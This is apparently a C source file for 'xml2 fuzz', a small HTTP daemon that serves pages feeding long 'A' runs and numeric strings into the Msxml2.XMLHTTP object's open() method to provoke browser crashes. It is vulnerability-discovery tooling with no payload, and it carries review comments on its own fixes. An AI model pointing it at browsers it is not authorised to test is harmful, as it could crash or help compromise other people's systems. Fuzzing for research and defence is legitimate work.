xml2 Fuzzer 1.0 exploit
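/*
 * xml2 fuzz ver 1.0 -- x90c
 *
 *     ./xml2_fuzz [aaaa|numeric]
 *
 * Description: a fuzz daemon aimed at a client-side COM object in a web
 * browser (the msxml2 XMLHTTP object; the original note lists libxml2 /
 * msxml2 as the target programs).
 *
 *   (1) the daemon listens on FUZZ_DAEMON_PORT (9090/tcp)
 *   (2) the browser under test opens http://<daemon>:9090/
 *   (3) the served page creates Msxml2.XMLHTTP.3.0 and calls open() with
 *       the current fuzz string as the HTTP method argument, then reloads
 *       itself so the daemon hands out the next case
 *
 * Fuzz modes: AAAA_FUZZ (runs of 'A' of growing length) and NUMERIC_FUZZ
 * (0 .. 0xfffffffe, then -0 .. -0xfffffffe).
 *
 * Fixes over the original listing:
 *   - the fuzz string was spliced into the page unquoted (open(AAAA, ...)),
 *     which is a JScript ReferenceError before the COM object is reached;
 *   - the response was built with sprintf() into a 65535-byte buffer while
 *     the fuzz string alone could be 65534 bytes (buffer overflow in the
 *     fuzzer itself), and Content-Length was set to the buffer size rather
 *     than the body length;
 *   - recv() <= 0 looped forever, and any request other than "GET / HTTP/1.1"
 *     (favicon, the XMLHTTP probe itself) ended the whole run;
 *   - the negative NUMERIC_FUZZ sweep never terminated (the roll-over reset
 *     fired on both sweeps).
 *
 * Build: Win32 (MSVC 2015+ for a C99-conformant snprintf), links ws2_32;
 * also builds on POSIX through the small socket shim below.
 *
 * NOTE(review): the daemon binds INADDR_ANY, so any host that can reach
 * port 9090 is served the page and can send bytes that are echoed to the
 * console; run it on an isolated network (or change the bind address to
 * loopback when the browser under test is local).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#  include <winsock2.h>
#  pragma comment(lib, "ws2_32.lib")
#  define FUZZ_CLOSESOCKET(s) closesocket(s)
typedef int fuzz_socklen_t;
#else
#  include <sys/types.h>
#  include <sys/socket.h>
#  include <netinet/in.h>
#  include <unistd.h>
#  define FUZZ_CLOSESOCKET(s) close(s)
#  define INVALID_SOCKET (-1)
#  define SOCKET_ERROR   (-1)
typedef int SOCKET;
typedef socklen_t fuzz_socklen_t;
#endif

#define FUZZ_DAEMON_PORT (9090)

/* fuzz type */
#define AAAA_FUZZ    (1)
#define NUMERIC_FUZZ (2)

/* Size of the response and fuzz-string buffers; also the AAAA run limit. */
#define FUZZ_BUF_SIZE 65535

static char http_res[FUZZ_BUF_SIZE];   /* complete HTTP response for the current case */
static char fuzz_str[FUZZ_BUF_SIZE];   /* current fuzz string, NUL-terminated */
static unsigned int fuzz_int;          /* NUMERIC_FUZZ: current magnitude */
static int fuzz_int_neg;               /* NUMERIC_FUZZ: 0 = positive sweep, 1 = negative sweep */

int set_fuzz_str(const char *mal_str);

/* Response headers; %d receives the exact body length. Connection: close
 * matches the daemon closing the socket right after send(). */
static const char fmt_http_hdr[] =
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Date: Sat Aug 28 1976 09:15:00 GMT\r\n"
    "Expires: Sat Aug 28 1976 09:15:00 GMT\r\n"
    "Cache-Control: no-cache, must-revalidate\r\n"
    "Pragma: no-cache\r\n"
    "Accept-Ranges: bytes\r\n"
    "Connection: close\r\n"
    "Content-Length: %d\r\n"
    "\r\n";

/*
 * Response body. %s is the fuzz string, placed inside a single-quoted JS
 * string literal (the original left it bare, which only parses for the
 * numeric cases). The two fuzz modes only produce [A0-9-], so no JS
 * escaping is needed; any new fuzz mode that emits ' or \ must escape them.
 * The try/catch keeps a thrown COM/network error from stopping the loop --
 * a crash of the browser is the finding, an exception is "next case" -- and
 * the reload is what makes the daemon advance (it only steps on GET /).
 */
static const char fmt_fuzz_str[] =
    "\n<script>\n"
    " function xml2_exploit() {\n"
    "  var request_url = location.protocol + '//' + location.host + '/';\n"
    "  try {\n"
    "   var xml_http_request = new ActiveXObject('Msxml2.XMLHTTP.3.0');\n"
    "   xml_http_request.open('%s', request_url, false);\n"
    "   xml_http_request.send();\n"
    "  } catch (e) { }\n"
    "  setTimeout(function () { location.reload(true); }, 1);\n"
    " }\n"
    " xml2_exploit();\n"
    "</script>\n";

/* Initialise the platform socket layer (Winsock 2.2); no-op on POSIX.
 * Returns 0 on success, -1 on failure. */
static int net_init(void)
{
#ifdef _WIN32
    WSADATA wsaData;
    return (WSAStartup(MAKEWORD(2, 2), &wsaData) == 0) ? 0 : -1;
#else
    return 0;
#endif
}

/* Counterpart of net_init(); the original never called WSACleanup(). */
static void net_cleanup(void)
{
#ifdef _WIN32
    WSACleanup();
#endif
}

/*
 * Advance the global fuzz state to the next case and rebuild http_res.
 *
 * fuzz_type  AAAA_FUZZ or NUMERIC_FUZZ
 * cnt_aaaa   in/out: length of the current 'A' run (AAAA_FUZZ only)
 *
 * Returns 0 when a new case is ready in http_res, 1 when the sweep is
 * exhausted, the type is unknown, or the case could not be rendered.
 */
static int next_fuzz_case(int fuzz_type, unsigned int *cnt_aaaa)
{
    memset(fuzz_str, 0, sizeof fuzz_str);

    switch (fuzz_type) {
    case AAAA_FUZZ:
        /* runs of 'A' from 2 up to FUZZ_BUF_SIZE-1; the last byte stays NUL */
        ++*cnt_aaaa;
        if (*cnt_aaaa >= FUZZ_BUF_SIZE)
            return 1;
        memset(fuzz_str, 'A', *cnt_aaaa);
        break;

    case NUMERIC_FUZZ:
        /* 0 .. 0xfffffffe, then -0 .. -0xfffffffe; %u because fuzz_int is
         * unsigned (the original's %d printed the upper half negative) */
        if (fuzz_int_neg == 0) {
            snprintf(fuzz_str, sizeof fuzz_str, "%u", fuzz_int);
        } else {
            if (fuzz_int >= 0xffffffffu)
                return 1;
            snprintf(fuzz_str, sizeof fuzz_str, "-%u", fuzz_int);
        }
        ++fuzz_int;
        /* Only the positive sweep rolls over into the negative one; the
         * negative sweep terminates above. */
        if (fuzz_int_neg == 0 && fuzz_int >= 0xffffffffu) {
            fuzz_int_neg = 1;
            fuzz_int = 0;
        }
        break;

    default:
        return 1;
    }

    return (set_fuzz_str(fuzz_str) == 0) ? 0 : 1;
}

/*
 * Run the fuzz daemon: listen on FUZZ_DAEMON_PORT, serve the current case
 * to every "GET / HTTP/1.1", then step to the next case.
 *
 * fuzz_type  AAAA_FUZZ or NUMERIC_FUZZ
 *
 * Returns 0 when the sweep finished, -1 on socket()/Winsock init failure,
 * -2 on bind(), -3 on listen(), -4 on accept(), -5 when the first case
 * could not be rendered.
 */
int fuzz_start(int fuzz_type)
{
    SOCKET srv_sockfd, cld_sockfd;
    struct sockaddr_in srv_addr, cld_addr;
    fuzz_socklen_t cld_addr_len;
    char recv_buf[1024];
    unsigned int cnt_aaaa = 1;
    int rc;

    if (net_init() != 0)
        return -1;

    memset(&srv_addr, 0, sizeof srv_addr);
    srv_addr.sin_family = AF_INET;
    srv_addr.sin_addr.s_addr = htonl(INADDR_ANY);   /* see NOTE(review) above */
    srv_addr.sin_port = htons(FUZZ_DAEMON_PORT);

    srv_sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (srv_sockfd == INVALID_SOCKET) {
        net_cleanup();
        return -1;
    }
    if (bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof srv_addr) == SOCKET_ERROR) {
        rc = -2;
        goto out;
    }
    if (listen(srv_sockfd, 1) == SOCKET_ERROR) {
        rc = -3;
        goto out;
    }

    /* First case is a single 'A' for both modes, as in the original. */
    memset(fuzz_str, 0, sizeof fuzz_str);
    fuzz_str[0] = 'A';
    fuzz_int = 0;
    fuzz_int_neg = 0;
    if (set_fuzz_str(fuzz_str) != 0) {
        rc = -5;
        goto out;
    }

    printf("xml2 fuzz: listen fuzz daemon [%d/tcp] \n", FUZZ_DAEMON_PORT);

    for (;;) {
        int got;

        cld_addr_len = (fuzz_socklen_t)sizeof cld_addr;
        cld_sockfd = accept(srv_sockfd, (struct sockaddr *)&cld_addr, &cld_addr_len);
        if (cld_sockfd == INVALID_SOCKET) {
            rc = -4;
            goto out;
        }

        /* A single read is enough for a browser GET; -1 keeps room for NUL. */
        got = (int)recv(cld_sockfd, recv_buf, sizeof recv_buf - 1, 0);
        if (got <= 0) {
            /* peer closed or error: drop this client, don't spin on recv() */
            FUZZ_CLOSESOCKET(cld_sockfd);
            continue;
        }
        recv_buf[got] = '\0';
        /* raw client bytes reach the terminal unescaped -- see NOTE(review) */
        printf("recv data: %s\n", recv_buf);

        if (strstr(recv_buf, "GET / HTTP/1.1") == NULL) {
            /* favicon requests and the XMLHTTP probe itself land here;
             * ignore them instead of ending the run */
            FUZZ_CLOSESOCKET(cld_sockfd);
            continue;
        }

        printf("HTTP response 200\n");
        send(cld_sockfd, http_res, (int)strlen(http_res), 0);
        FUZZ_CLOSESOCKET(cld_sockfd);

        if (next_fuzz_case(fuzz_type, &cnt_aaaa) != 0)
            break;
    }

    fprintf(stderr, "xml2 fuzz: fuzz end!\n");
    rc = 0;

out:
    FUZZ_CLOSESOCKET(srv_sockfd);
    net_cleanup();
    return rc;
}

/*
 * Render the HTTP response for one fuzz string into http_res.
 *
 * mal_str  the fuzz string to embed in the page (NUL-terminated)
 *
 * Returns 0 on success; -1 when mal_str is NULL or the rendered response
 * would not fit in http_res (http_res is then emptied). The body is
 * measured first so Content-Length is exact; every write is bounded.
 */
int set_fuzz_str(const char *mal_str)
{
    int body_len, hdr_len, written;

    if (mal_str == NULL)
        return -1;

    memset(http_res, 0, sizeof http_res);

    body_len = snprintf(NULL, 0, fmt_fuzz_str, mal_str);
    if (body_len < 0)
        goto too_long;

    hdr_len = snprintf(http_res, sizeof http_res, fmt_http_hdr, body_len);
    if (hdr_len < 0 || (size_t)hdr_len >= sizeof http_res)
        goto too_long;

    written = snprintf(http_res + hdr_len, sizeof http_res - (size_t)hdr_len,
                       fmt_fuzz_str, mal_str);
    if (written < 0 || (size_t)written >= sizeof http_res - (size_t)hdr_len)
        goto too_long;

    return 0;

too_long:
    printf("xml2 fuzz: too long malformed string\n");
    http_res[0] = '\0';
    return -1;
}

/* Start-up banner ("x90c"); backslashes are escaped, the original "\__."
 * was an unknown escape sequence. */
static const char banner[] =
    "        ___    ___        \n"
    "       / _ \\  / _ \\       \n"
    "__ __ | (_) || | | |  ___ \n"
    "\\ \\/ / \\__. || | | | / __|\n"
    " >  <    / / | |_| || (__ \n"
    "/_/\\_\\  /_/   \\___/  \\___|\n"
    "\n"
    "     xml2 fuzzer ver 1.0\n"
    "\n"
    "     ./xml2_fuzz [aaaa|numeric]\n"
    "\n";

/*
 * Entry point. Optional argv[1] selects the mode: "aaaa" (default, as in
 * the original) or "numeric" (the sweep the original left commented out).
 * Returns 0 when the sweep finished, 1 on bad usage or start-up failure.
 */
int main(int argc, char **argv)
{
    int fuzz_type = AAAA_FUZZ;

    if (argc > 1) {
        if (strcmp(argv[1], "numeric") == 0) {
            fuzz_type = NUMERIC_FUZZ;
        } else if (strcmp(argv[1], "aaaa") != 0) {
            fprintf(stderr, "usage: %s [aaaa|numeric]\n", argv[0]);
            return 1;
        }
    }

    printf("%s", banner);

    if (fuzz_start(fuzz_type) < 0) {
        fprintf(stderr, "xml2 fuzz: start failed!\n");
        return 1;
    }
    return 0;
}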